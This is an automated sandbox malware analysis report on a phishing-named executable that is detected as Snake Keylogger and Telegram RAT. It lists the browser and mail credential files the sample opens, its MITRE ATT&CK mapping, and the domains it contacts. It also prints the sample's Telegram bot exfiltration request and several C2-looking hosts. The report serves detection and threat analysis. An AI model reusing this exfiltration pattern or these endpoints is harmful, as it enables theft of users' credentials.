Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe

Code function: 0_2_00405D51 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

0_2_00405D51

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000004.00000002.4128839595.0000000020091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: msiexec.exe PID: 7808, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\msiexec.exe

File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\

Jump to behavior

Source: Yara match	File source: 00000004.00000002.4128839595.000000002019D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 7808, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000004.00000002.4128839595.0000000020091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: msiexec.exe PID: 7808, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	2 Obfuscated Files or Information	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 PowerShell	Boot or Logon Initialization Scripts	1 Access Token Manipulation	1 Software Packing	LSASS Memory	14 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	311 Process Injection	1 DLL Side-Loading	Security Account Manager	11 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	21 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Masquerading	NTDS	1 Process Discovery	Distributed Component Object Model	1 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	31 Virtualization/Sandbox Evasion	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Access Token Manipulation	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	311 Process Injection	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PAGO FRAS. AGOSTO 2024..exe	21%	Virustotal		Browse
PAGO FRAS. AGOSTO 2024..exe	11%	ReversingLabs	Win32.Spyware.Snakekeylogger

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Svarbrevets\PAGO FRAS. AGOSTO 2024..exe	11%	ReversingLabs	Win32.Spyware.Snakekeylogger

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
reallyfreegeoip.org	0%	Virustotal	Browse
drive.usercontent.google.com	1%	Virustotal	Browse
drive.google.com	0%	Virustotal	Browse
api.telegram.org	2%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	URL Reputation	safe
http://nsis.sf.net/NSIS_ErrorError	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
http://nsis.sf.net/NSIS_Error	0%	URL Reputation	safe
https://aka.ms/pscore6lB	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
https://apis.google.com	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
drive.google.com	142.250.185.206	true	false	0%, Virustotal, Browse	unknown
drive.usercontent.google.com	216.58.206.33	true	false	1%, Virustotal, Browse	unknown
reallyfreegeoip.org	188.114.97.3	true	true	0%, Virustotal, Browse	unknown
api.telegram.org	149.154.167.220	true	true	2%, Virustotal, Browse	unknown
checkip.dyndns.com	158.101.44.242	true	false		unknown
checkip.dyndns.org	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:138727%0D%0ADate%20and%20Time:%2021/10/2024%20/%2019:07:34%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20138727%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		unknown
https://reallyfreegeoip.org/xml/155.94.241.186	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	msiexec.exe, 00000004.00000002.4128839595.0000000020287000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000001.00000002.1860973910.00000000060FC000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org	msiexec.exe, 00000004.00000002.4128839595.0000000020178000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000001.00000002.1858126944.00000000051E6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot	msiexec.exe, 00000004.00000002.4128839595.0000000020178000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000001.00000002.1858126944.00000000051E6000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://contoso.com/License	powershell.exe, 00000001.00000002.1860973910.00000000060FC000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.office.com/lB	msiexec.exe, 00000004.00000002.4128839595.0000000020282000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://contoso.com/Icon	powershell.exe, 00000001.00000002.1860973910.00000000060FC000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://drive.usercontent.google.com/	msiexec.exe, 00000004.00000002.4115622500.0000000000876000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.1969721891.0000000000876000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://checkip.dyndns.org	msiexec.exe, 00000004.00000002.4128839595.0000000020091000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	msiexec.exe, 00000004.00000002.4128839595.000000002019D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.0000000021361000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.0000000021313000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.00000000211BD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.000000002116F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.0000000021436000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.00000000211E4000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	PAGO FRAS. AGOSTO 2024..exe, PAGO FRAS. AGOSTO 2024..exe.1.dr	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	msiexec.exe, 00000004.00000002.4128839595.000000002019D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.0000000021361000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.0000000021313000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.00000000211BD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.000000002116F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.0000000021436000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.00000000211E4000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=	msiexec.exe, 00000004.00000002.4128839595.0000000020178000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://chrome.google.com/webstore?hl=en	msiexec.exe, 00000004.00000002.4128839595.0000000020256000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4128839595.0000000020247000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4128839595.0000000020287000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://reallyfreegeoip.org/xml/155.94.241.186$	msiexec.exe, 00000004.00000002.4128839595.000000002010B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4128839595.0000000020178000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4128839595.0000000020150000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://varders.kozow.com:8081	msiexec.exe, 00000004.00000002.4128839595.0000000020091000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://github.com/Pester/Pester	powershell.exe, 00000001.00000002.1858126944.00000000051E6000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://crl.mi	powershell.exe, 00000001.00000002.1866731311.0000000007837000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://aborters.duckdns.org:8081	msiexec.exe, 00000004.00000002.4128839595.0000000020091000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.google.com	msiexec.exe, 00000004.00000003.1925140710.0000000000876000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.1923872826.0000000000876000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://nsis.sf.net/NSIS_Error	PAGO FRAS. AGOSTO 2024..exe, PAGO FRAS. AGOSTO 2024..exe.1.dr	false	URL Reputation: safe	unknown
https://aka.ms/pscore6lB	powershell.exe, 00000001.00000002.1858126944.0000000005091000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://drive.google.com/	msiexec.exe, 00000004.00000002.4115622500.00000000007EA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://anotherarmy.dns.army:8081	msiexec.exe, 00000004.00000002.4128839595.0000000020091000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	msiexec.exe, 00000004.00000002.4129881517.00000000212EE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.00000000211BF000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.0000000021319000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.0000000021412000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.000000002114A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.0000000021175000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 00000001.00000002.1860973910.00000000060FC000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000001.00000002.1860973910.00000000060FC000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://chrome.google.com/webstore?hl=enlB	msiexec.exe, 00000004.00000002.4128839595.0000000020251000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://reallyfreegeoip.org	msiexec.exe, 00000004.00000002.4128839595.00000000200E0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4128839595.0000000020178000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4128839595.0000000020150000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:138727%0D%0ADate%20a	msiexec.exe, 00000004.00000002.4128839595.0000000020178000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://apis.google.com	msiexec.exe, 00000004.00000003.1925140710.0000000000876000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.1923872826.0000000000876000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	msiexec.exe, 00000004.00000002.4129881517.00000000212EE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.00000000211BF000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.0000000021319000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.0000000021412000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.000000002114A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.0000000021175000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000001.00000002.1858126944.0000000005091000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4128839595.0000000020091000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/	msiexec.exe, 00000004.00000002.4128839595.00000000200E0000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
142.250.185.206	drive.google.com	United States	15169	GOOGLEUS	false
188.114.97.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true
216.58.206.33	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
158.101.44.242	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1538463
Start date and time:	2024-10-21 11:02:46 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 33s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PAGO FRAS. AGOSTO 2024..exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/14@5/5
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 95% Number of executed functions: 113 Number of non-executed functions: 94
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 7432 because it is empty
Not all processes where analyzed, report is missing behavior information
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
05:03:37	API Interceptor	37x Sleep call for process: powershell.exe modified
05:04:09	API Interceptor	9630444x Sleep call for process: msiexec.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	RFQ-KTE-07102024.pdf.scr	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	rRFQ24201007_pdf.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	PROFOMA INVOICE 90021144577.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	routcrying.exe	Get hash	malicious	Snake Keylogger	Browse
	mnobizx.com.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	mnobizx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	rcota____oRFQNO-N__merodopedido106673.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	SecuriteInfo.com.Win64.Malware-gen.32485.11504.exe	Get hash	malicious	Python Stealer, Braodo	Browse
	Wuerth_factura_4052073226..exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	KIDy5J5su4.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
188.114.97.3	http://comodozeropoint.com/updates/1736162964/N1/Team.exe	Get hash	malicious	Unknown	Browse	comodozeropoint.com/updates/1736162964/N1/Team.exe
	SecuriteInfo.com.Win32.MalwareX-gen.14607.6011.exe	Get hash	malicious	Unknown	Browse	servicetelemetryserver.shop/api/index.php
	SecuriteInfo.com.Trojan.DownLoader47.45523.5497.16574.exe	Get hash	malicious	Unknown	Browse	servicetelemetryserver.shop/api/index.php
	SecuriteInfo.com.Trojan.DownLoader47.45523.5497.16574.exe	Get hash	malicious	Unknown	Browse	servicetelemetryserver.shop/api/index.php
	ZP4KZDHVHWZZ2DC13DMX.exe	Get hash	malicious	Amadey	Browse	tipinfodownload-soft1.com/g9jvjfd73/index.php
	aQdB62N7SB.elf	Get hash	malicious	Shikitega, Xmrig	Browse	main.dsn.ovh/dns/loadbit
	PO#071024.exe	Get hash	malicious	FormBook	Browse	www.freedietbuilder.online/nnla/
	NOXGUARD AUS 40 UREA__912001_NOR_EN - MSDS.exe	Get hash	malicious	Unknown	Browse	www.ergeneescortg.xyz/guou/
	QUOTATION_OCTQTRA071244PDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/DyuQ5y15/download
	Payment.cmd	Get hash	malicious	Azorult, DBatLoader	Browse	dsye.shop/DS341/index.php
158.101.44.242	#U304a#U898b#U7a4d#U308a#U4f9d#U983c.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	checkip.dyndns.org/
	RFQ-KTE-07102024.pdf.scr	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Supplier RFQ ID 365242213q___________________________pdf.exe	Get hash	malicious	Snake Keylogger, XRed	Browse	checkip.dyndns.org/
	RFQ-KTE-07102024.pdf.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Request for Q uotation.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	BON 521264.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	ACCOUNTXSTATEMENT.xls	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	PO-94858.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	uYP4XsZFKS.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Kontodetails.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	#U304a#U898b#U7a4d#U308a#U4f9d#U983c.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.97.3
	RFQ-KTE-07102024.pdf.scr	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	rRFQ24201007_pdf.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	PROFOMA INVOICE 90021144577.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	routcrying.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	mnobizx.com.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	mnobizx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	rcota____oRFQNO-N__merodopedido106673.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Wuerth_factura_4052073226..exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	NEW CUSTOMER ORDER.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
checkip.dyndns.com	#U304a#U898b#U7a4d#U308a#U4f9d#U983c.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	158.101.44.242
	RFQ-KTE-07102024.pdf.scr	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	rRFQ24201007_pdf.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	PROFOMA INVOICE 90021144577.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	routcrying.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	mnobizx.com.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	mnobizx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	rcota____oRFQNO-N__merodopedido106673.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	Wuerth_factura_4052073226..exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.8.169
	NEW CUSTOMER ORDER.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
api.telegram.org	RFQ-KTE-07102024.pdf.scr	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	rRFQ24201007_pdf.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PROFOMA INVOICE 90021144577.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	routcrying.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	mnobizx.com.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	mnobizx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	rcota____oRFQNO-N__merodopedido106673.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.Win64.Malware-gen.32485.11504.exe	Get hash	malicious	Python Stealer, Braodo	Browse	149.154.167.220
	Wuerth_factura_4052073226..exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	KIDy5J5su4.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	RFQ-KTE-07102024.pdf.scr	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	rRFQ24201007_pdf.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Unlock_Tool_2.3.1.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	aZm1EZ2IYr.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	Unlock_Tool_2.4.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
